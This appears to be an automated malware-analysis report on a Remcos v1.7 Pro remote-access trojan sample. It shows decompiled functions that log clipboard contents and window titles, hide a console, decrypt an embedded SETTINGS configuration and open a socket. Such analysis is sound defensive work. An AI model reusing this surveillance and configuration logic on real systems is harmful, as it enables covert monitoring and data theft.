                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				}
                                          				_t24 = 1;
                                          				return _t24;
                                          			}














                                          0x0040c90b
                                          0x0040c91c
                                          0x0040c93c
                                          0x0040c953
                                          0x0040c977
                                          0x0040c97b
                                          0x0040c984
                                          0x0040c988
                                          0x0040c991
                                          0x0040c995
                                          0x0040c9a3
                                          0x0040c9ac
                                          0x0040c9b5
                                          0x0040c9be
                                          0x0040c9c7
                                          0x0040c9d0
                                          0x0040c9d0
                                          0x0040c9d8
                                          0x0040c9da

                                          APIs
                                          • GetWindowTextW.USER32 ref: 0040C90B
                                          • IsWindowVisible.USER32(?), ref: 0040C914
                                          • sprintf.MSVCRT ref: 0040C93C
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040C953
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,0041171C,?,00411728), ref: 0040C97B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00411728), ref: 0040C988
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00411728), ref: 0040C995
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00411728), ref: 0040C9A3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9AC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9B5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9BE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9C7
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9D0
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@0@Hstd@@V10@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V01@@Window$D@1@@G@1@@TextV01@VisibleY?$basic_string@sprintf
                                          • String ID:
                                          • API String ID: 1029694555-0
                                          • Opcode ID: d1a5efd950a48ac111f91248e106e01afb4cc1c703c408ec3dfb3afdd1bed23d
                                          • Instruction ID: 4e002e25e0f648f437be034c291f2efbcbeefca2187121b50d5874a0224bd0e6
                                          • Opcode Fuzzy Hash: d1a5efd950a48ac111f91248e106e01afb4cc1c703c408ec3dfb3afdd1bed23d
                                          • Instruction Fuzzy Hash: 7621DA72D4010EABDF14ABA0EC8DDDE777DAB14308F008476F516A21A1EB7896898B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00408EF1: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                            • Part of subcall function 00408EF1: RegQueryValueExA.KERNELBASE(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                            • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                            • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E5F6
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7), ref: 0040E609
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E613
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E61C
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E635
                                            • Part of subcall function 0040EED4: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(?,00000000,7313CB00,?,?,0040E644,?), ref: 0040EEE3
                                            • Part of subcall function 0040EED4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,0040E644,?), ref: 0040EF01
                                            • Part of subcall function 0040EED4: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,0040E644,?), ref: 0040EF09
                                            • Part of subcall function 0040EED4: ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,00000000,?,?,0040E644,?), ref: 0040EF14
                                            • Part of subcall function 0040EED4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0040E644,?), ref: 0040EF1E
                                            • Part of subcall function 0040EED4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF27
                                            • Part of subcall function 0040EED4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF3F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040E64B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E654
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E661
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E66A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@D@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                          • String ID: .exe$http\shell\open\command
                                          • API String ID: 1097156965-4091164470
                                          • Opcode ID: 08a1c99976d7565a188055a544cab16fbeaa302825a2accc4baf47b801d316af
                                          • Instruction ID: c33ef1c1da018883c7c7ab6d04285324c3d84ed8a02606c642186c54a30d9d8b
                                          • Opcode Fuzzy Hash: 08a1c99976d7565a188055a544cab16fbeaa302825a2accc4baf47b801d316af
                                          • Instruction Fuzzy Hash: EF11F17190011EABDF04EBE0DC4DFEE7778FB14305F444469F512A21A1EEB8A548CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E00405142(void* __ecx) {
                                          				char _v5;
                                          				char _v24;
                                          				char _v40;
                                          				char* _t13;
                                          				void* _t18;
                                          				void* _t34;
                                          
                                          				_t18 = __ecx;
                                          				if(( *0x4156b8 & 0x00000001) == 0) {
                                          					 *0x4156b8 =  *0x4156b8 | 0x00000001;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          					E0040FCBA(E00405201);
                                          				}
                                          				E004050FC(_t18,  &_v24);
                                          				_t13 =  &_v24;
                                          				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x4156a8);
                                          				if(_t13 == 0) {
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
                                          					_t13 =  &_v24;
                                          					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x410668);
                                          					if(_t13 != 0) {
                                          						L0040FC1A();
                                          						L0040FC20();
                                          						_t13 = E00403A9A(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x4156a8);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
                                          					}
                                          				}
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t13;
                                          			}









                                          0x00405152
                                          0x00405159
                                          0x0040515b
                                          0x00405168
                                          0x00405173
                                          0x00405178
                                          0x0040517f
                                          0x00405189
                                          0x0040518e
                                          0x00405198
                                          0x004051a0
                                          0x004051a6
                                          0x004051af
                                          0x004051b9
                                          0x004051d1
                                          0x004051db
                                          0x004051e5
                                          0x004051ed
                                          0x004051ed
                                          0x004051b9
                                          0x004051f6
                                          0x00405200

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,74B06490,?,?,?,?,?,00404196), ref: 00405168
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,004156A8,?,?,00000000,74B06490,?,?,?,?,?,00404196), ref: 0040518E
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00404196), ref: 004051A0
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668,?,?,?,00404196), ref: 004051AF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],004156A8,[End of clipboard text]), ref: 004051D1
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 004051DB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 004051ED
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00404196), ref: 004051F6
                                          Strings
                                          • [Following text has been copied to clipboard:], xrefs: 004051CB
                                          • [End of clipboard text], xrefs: 004051C5
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                          • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                          • API String ID: 1191203583-3441917614
                                          • Opcode ID: 90c1c98ff18be6c2d4d3753f8e68d31aeb205785e0e6a9307077bf7a6d6592dc
                                          • Instruction ID: 00a8ace4b862f7325ec407ea538c2c3054ea5e1f5129ba08377fdacfa38d8bab
                                          • Opcode Fuzzy Hash: 90c1c98ff18be6c2d4d3753f8e68d31aeb205785e0e6a9307077bf7a6d6592dc
                                          • Instruction Fuzzy Hash: 5911B731A002099BCB00E7A4ED4EEEF3B6CDB84315F10007BF405B2181DE788D89876D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00402646(void* __ecx, intOrPtr _a4, char _a7) {
                                          				struct _SYSTEMTIME _v20;
                                          				char _v36;
                                          				void* _v52;
                                          				char* _t23;
                                          				char* _t24;
                                          				intOrPtr _t33;
                                          				void* _t35;
                                          				intOrPtr _t40;
                                          
                                          				_t35 = __ecx;
                                          				if( *((intOrPtr*)(__ecx + 0x34)) != 0) {
                                          					return 0;
                                          				}
                                          				_t40 =  *0x415938; // 0x0
                                          				_t33 = _a4;
                                          				if(_t40 != 0) {
                                          					GetLocalTime( &_v20);
                                          					_t23 =  &_a7;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [KeepAlive] ", _t23, "Enabled! (Timeout: %i seconds)\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t33);
                                          					_t24 =  &_v36;
                                          					L0040FC20();
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t24, _t23);
                                          					printf(_t24);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				 *((char*)(_t35 + 0x34)) = 1;
                                          				 *((intOrPtr*)(_t35 + 0x38)) = _t33;
                                          				CreateThread(0, 0, E00402823, _t35, 0, 0);
                                          				return 1;
                                          			}











                                          0x0040264e
                                          0x00402655
                                          0x00000000
                                          0x004026ea
                                          0x0040265b
                                          0x00402662
                                          0x00402665
                                          0x0040266b
                                          0x00402689
                                          0x00402697
                                          0x0040269e
                                          0x004026a2
                                          0x004026ac
                                          0x004026b3
                                          0x004026bf
                                          0x004026c8
                                          0x004026c8
                                          0x004026d8
                                          0x004026dc
                                          0x004026df
                                          0x00000000

                                          APIs
                                          • GetLocalTime.KERNEL32(?,758EFF80,00415A30,7313CB00,?,?,?,?,?,?,?,?,?,?,?,0040A950), ref: 0040266B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Enabled! (Timeout: %i seconds),?,?,0040A950,?,?), ref: 00402697
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A950,?), ref: 004026A2
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A950,?), ref: 004026AC
                                          • printf.MSVCRT ref: 004026B3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C8
                                          • CreateThread.KERNEL32 ref: 004026DF
                                          Strings
                                          • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 00402692
                                          • Enabled! (Timeout: %i seconds), xrefs: 0040268C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                          • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Enabled! (Timeout: %i seconds)
                                          • API String ID: 3715082883-3146830426
                                          • Opcode ID: 3a9708a68446399abd0b795bd19e37fdc65d9098a2dc3f9d79772d21f0b7afde
                                          • Instruction ID: 79c03f263a9eabdf1fe5f6b3bc6f9ebe40ce7b552af33f5414839a7309894a53
                                          • Opcode Fuzzy Hash: 3a9708a68446399abd0b795bd19e37fdc65d9098a2dc3f9d79772d21f0b7afde
                                          • Instruction Fuzzy Hash: F01186B2501218BFCB509BE4DD8DCFFB7BCAA44714B004477F542A2190DAB9A984C778
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E0040FAED(signed int __edx, intOrPtr _a4) {
                                          				void _v1003;
                                          				char _v1004;
                                          				struct HWND__* _t13;
                                          				signed int _t34;
                                          				signed int _t36;
                                          				unsigned int _t40;
                                          				signed int _t41;
                                          				signed int _t47;
                                          				signed int _t50;
                                          				signed int _t56;
                                          				signed int _t59;
                                          				signed int _t64;
                                          				signed int _t65;
                                          				void* _t91;
                                          				void* _t92;
                                          				void* _t93;
                                          
                                          				_t64 = __edx;
                                          				AllocConsole();
                                          				_t13 =  *0x415ba8();
                                          				 *0x415bac = _t13;
                                          				if(_a4 == 0) {
                                          					ShowWindow(_t13, 0);
                                          				}
                                          				freopen("CONOUT$", "a", __imp___iob + 0x20);
                                          				_v1004 = 0;
                                          				memset( &_v1003, 0, 0xf9 << 2);
                                          				asm("stosw");
                                          				asm("stosb");
                                          				_t65 = _t64 | 0xffffffff;
                                          				asm("repne scasb");
                                          				_t40 =  !_t65;
                                          				_t91 = " * REMCOS v" - _t40;
                                          				_t41 = _t40 >> 2;
                                          				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
                                          				asm("repne scasb");
                                          				_t47 =  !_t65;
                                          				_t92 = "1.7 Pro" - _t47;
                                          				_t34 = _t47;
                                          				asm("repne scasb");
                                          				_t50 = _t34 >> 2;
                                          				memcpy( &_v1004 - 1, _t92, _t50 << 2);
                                          				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
                                          				asm("repne scasb");
                                          				_t56 =  !_t65;
                                          				_t93 = "\n * Breaking-Security.Net\n\n" - _t56;
                                          				_t36 = _t56;
                                          				asm("repne scasb");
                                          				_t59 = _t36 >> 2;
                                          				memcpy( &_v1004 - 1, _t93, _t59 << 2);
                                          				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
                                          				return printf( &_v1004);
                                          			}



















                                          0x0040faed
                                          0x0040faf9
                                          0x0040faff
                                          0x0040fb07
                                          0x0040fb0f
                                          0x0040fb13
                                          0x0040fb13
                                          0x0040fb2c
                                          0x0040fb3f
                                          0x0040fb45
                                          0x0040fb47
                                          0x0040fb49
                                          0x0040fb4a
                                          0x0040fb56
                                          0x0040fb58
                                          0x0040fb64
                                          0x0040fb6e
                                          0x0040fb7a
                                          0x0040fb83
                                          0x0040fb85
                                          0x0040fb89
                                          0x0040fb8d
                                          0x0040fb91
                                          0x0040fb96
                                          0x0040fb99
                                          0x0040fba6
                                          0x0040fbaf
                                          0x0040fbb1
                                          0x0040fbb5
                                          0x0040fbb9
                                          0x0040fbbd
                                          0x0040fbc2
                                          0x0040fbc5
                                          0x0040fbd3
                                          0x0040fbe2

                                          APIs
                                          • AllocConsole.KERNEL32(74B043E0,00000000,00415940), ref: 0040FAF9
                                          • GetConsoleWindow.KERNEL32 ref: 0040FAFF
                                          • ShowWindow.USER32(00000000,00000000), ref: 0040FB13
                                          • freopen.MSVCRT ref: 0040FB2C
                                          • printf.MSVCRT ref: 0040FBD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ConsoleWindow$AllocShowfreopenprintf
                                          • String ID: * Breaking-Security.Net$ * REMCOS v$1.7 Pro$CONOUT$
                                          • API String ID: 758035570-4154014664
                                          • Opcode ID: 85a77a9c2555b3fe81e500512262144cb936832edbba782d647d7bbe067822b6
                                          • Instruction ID: 2f2b88ad7b218c54194607ff57f3a4bae2920d7697a65db163e517dfa2cb7a2b
                                          • Opcode Fuzzy Hash: 85a77a9c2555b3fe81e500512262144cb936832edbba782d647d7bbe067822b6
                                          • Instruction Fuzzy Hash: 6D212832B0020C1BCB299B7DDCA45EE7A9BA7C4251B94817EF90BD73D0DEB04D888608
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E00407C53(intOrPtr _a4) {
                                          				unsigned int _v8;
                                          				signed char* _v12;
                                          				char _v13;
                                          				void* _v20;
                                          				void* _v24;
                                          				char _v40;
                                          				void* _v56;
                                          				char _v1092;
                                          				void* _t36;
                                          				signed int _t38;
                                          				signed int _t42;
                                          				signed int _t44;
                                          				int _t51;
                                          				signed int _t54;
                                          				signed int _t55;
                                          				signed int _t66;
                                          				signed char* _t76;
                                          				void* _t83;
                                          				void* _t88;
                                          				void* _t89;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_v8 = E00408150( &_v12);
                                          				_t51 =  *_v12 & 0x000000ff;
                                          				_t36 = malloc(_t51);
                                          				_t76 = _v12;
                                          				_t54 = _t51;
                                          				_t7 = _t76 + 1; // 0x1
                                          				_t88 = _t7;
                                          				_v24 = _t36;
                                          				_t55 = _t54 >> 2;
                                          				memcpy(_t36, _t88, _t55 << 2);
                                          				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
                                          				_t83 = malloc(_v8);
                                          				_t42 = _v12;
                                          				_v20 = _t83;
                                          				_t20 = _t42 + 1; // 0x1
                                          				_t89 = _t51 + _t20;
                                          				_t66 = _v8 >> 2;
                                          				_t44 = memcpy(_t83, _t89, _t66 << 2);
                                          				_t22 =  &_v24; // 0x407464
                                          				memcpy(_t89 + _t66 + _t66, _t89, _t44 & 0x00000003);
                                          				E004028EB( &_v1092,  *_t22, _t51);
                                          				E00402A2A( &_v1092,  &_v40, _v20, _v8);
                                          				free(_v20);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _a4;
                                          			}























                                          0x00407c5c
                                          0x00407c6c
                                          0x00407c72
                                          0x00407c76
                                          0x00407c7c
                                          0x00407c83
                                          0x00407c85
                                          0x00407c85
                                          0x00407c8a
                                          0x00407c8d
                                          0x00407c90
                                          0x00407c97
                                          0x00407ca2
                                          0x00407cae
                                          0x00407cb7
                                          0x00407cc2
                                          0x00407cce
                                          0x00407cd0
                                          0x00407cd4
                                          0x00407cda
                                          0x00407cda
                                          0x00407ce1
                                          0x00407ce4
                                          0x00407ce6
                                          0x00407cee
                                          0x00407cf6
                                          0x00407d0b
                                          0x00407d13
                                          0x00407d21
                                          0x00407d2a
                                          0x00407d37

                                          APIs
                                            • Part of subcall function 00408150: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040815E
                                            • Part of subcall function 00408150: LoadResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408169
                                            • Part of subcall function 00408150: LockResource.KERNEL32(00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408170
                                            • Part of subcall function 00408150: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 0040817B
                                          • malloc.MSVCRT ref: 00407C76
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00407CA2
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407CAE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407CB7
                                          • malloc.MSVCRT ref: 00407CC8
                                            • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                                            • Part of subcall function 00402A2A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                                            • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                                            • Part of subcall function 00402A2A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                                          • free.MSVCRT(?,?,?,?,dt@,00000000), ref: 00407D13
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407D21
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407D2A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                          • String ID: dt@
                                          • API String ID: 531887698-2366654348
                                          • Opcode ID: 986cc1e09f076ae00b03e92c541cff929956ae5efa4b9e40f25a22f0709455da
                                          • Instruction ID: e7c362bbf55d6fe362def41f57b44465b4cf4643257c8798677b0b7ff2d7c4a4
                                          • Opcode Fuzzy Hash: 986cc1e09f076ae00b03e92c541cff929956ae5efa4b9e40f25a22f0709455da
                                          • Instruction Fuzzy Hash: 7F310776A00009EFCF04DBA4D9999EEBBB9FB48315F1041A9E906A3290DA746E48DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
